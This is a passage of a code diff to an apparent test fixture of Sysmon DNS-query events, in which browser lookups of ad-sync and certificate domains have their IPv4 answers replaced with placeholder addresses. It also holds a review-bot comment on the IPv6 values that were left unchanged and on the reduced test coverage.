pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -4926,7 +4926,7 @@
 "ProcessId": "2736",
 "QueryName": "status.rapidssl.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;",
+ "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.184",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -4950,7 +4950,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -4967,7 +4967,7 @@
 "time_created": "2019-07-18T03:34:04.692Z",
 "level": "information",
 "event_data": {
- "QueryResults": "type: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;",
+ "QueryResults": "type: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:04.184",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}",
@@ -4990,7 +4990,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -5015,7 +5015,7 @@
 "ProcessId": "2736",
 "QueryName": "ocsp.comodoca.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;",
+ "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"
 },
 "process": {
@@ -5031,7 +5031,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5043,7 +5043,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5073,7 +5073,7 @@ "ProcessId": "2736", "QueryName": "sync-tm.everesttech.net", "QueryStatus": "0", - "QueryResults": "type: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;", + "QueryResults": "type: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "event_id": "22" @@ -5104,7 +5104,7 @@ "event_data": { "QueryName": "idsync.rlcdn.com", "QueryStatus": "0", - "QueryResults": "::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.237", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", 
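Review bot: In the `@@ -5104` hunk the IPv4 answers in `QueryResults` are rewritten to `89.160.20.156` and `192.168.x.30`, but the IPv6 answers on the same line (`2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30`, `2001:500:856e::30`, `2001:502:1ca1::30`) are left untouched, so the fixture still carries real public addresses; the same applies to the hunks at `@@ -5115`, `@@ -5214`, `@@ -5241`, `@@ -5337`, `@@ -5354`, `@@ -5387` and `@@ -5409`. If the intent is to keep only reserved test addresses in the sample data, those IPv6 values should be mapped as well, for example to the documentation range (`2001:db8::/32`), and the expected file regenerated rather than hand-edited so `event.original` and `winlog.event_data.QueryResults` cannot drift apart. A secondary effect worth checking is that every multi-answer record now repeats one identical address (`::ffff:89.160.20.156` six times), so if the pipeline de-duplicates resolved addresses the expected output no longer exercises parsing of a list of distinct results; using a handful of distinct reserved addresses would keep that coverage.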
@@ -5115,7 +5115,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" 
@@ -5127,7 +5127,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
